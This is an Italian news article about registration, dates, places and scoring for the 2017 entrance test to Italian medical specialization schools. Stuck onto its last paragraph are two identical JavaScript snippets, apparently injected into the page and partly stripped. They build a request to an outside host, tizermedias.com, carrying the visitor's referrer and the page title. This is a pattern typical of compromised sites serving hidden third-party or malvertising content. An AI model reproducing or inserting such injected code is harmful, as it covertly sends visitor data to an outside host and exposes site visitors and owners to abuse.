iscrizioni test scuole di specializzazione mediche 2017

Si terrà il prossimo 28 novembre la prova per l’accesso alle scuole di specializzazione mediche 2017. Il bando è stato pubblicato dal MIUR e contiene le indicazioni circa le procedure e le tempistiche di iscrizione alla prova, il numero di borse disponibili e le modalità del test selettivo. Ci sarà posto per 6.676 nuovi specializzandi, che si distribuiranno tra le 1.256 scuole attivate (su 1.300 accreditate) nelle varie sedi sparse sul territorio nazionale.

Per partecipare al test di accesso alle scuole di specializzazione mediche 2017 occorrerà effettuare l’iscrizione allo stesso da giovedì 5 fino alle ore 15.00 del 16 ottobre attraverso il portale UniversItaly. Per poter essere ammessi alle scuole occorrerà non solo superare la prova e classificarsi in posizione utile nella graduatoria unica nazionale di merito, ma anche aver conseguito l’abilitazione professionale entro l’avvio delle attività didattiche, previsto entro e non oltre il prossimo 29 dicembre.

Tra le novità che caratterizzeranno le selezioni per l’accesso alle scuole di specializzazione mediche 2017 ci sarà l’aggregazione per aree geografiche delle sedi d’esame. La misura è stata adottata per garantire maggior trasparenza ed equità ed era stata sollecitata anche da associazioni degli specializzandi, Conferenza dei Rettori e Consiglio Nazionale degli Studenti Universitari. Entro il 7 novembre prossimo, ciascuno degli iscritti alla prova, che sarà uguale su tutto il territorio nazionale, potrà conoscere la sede nella quale dovrà recarsi per svolgerla e l’orario di inizio della stessa.

Il test d’accesso alle scuole di specializzazione mediche 2017 conterrà 140 quesiti. Ciascuna delle risposte corrette varrà un punto, mentre ciascuna di quelle errate comporterà la perdita di 0,25 punti. Non sono previste, invece, variazioni di punteggio per le risposte non date. Il concorso sarà per titoli ed esami, ma nella graduatoria – a parità di punteggio complessivo – sarà data precedenza al candidato che avrà ottenuto la valutazione migliore nella prova. In caso di ulteriore parità, sarà privilegiato il candidato più giovane.(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();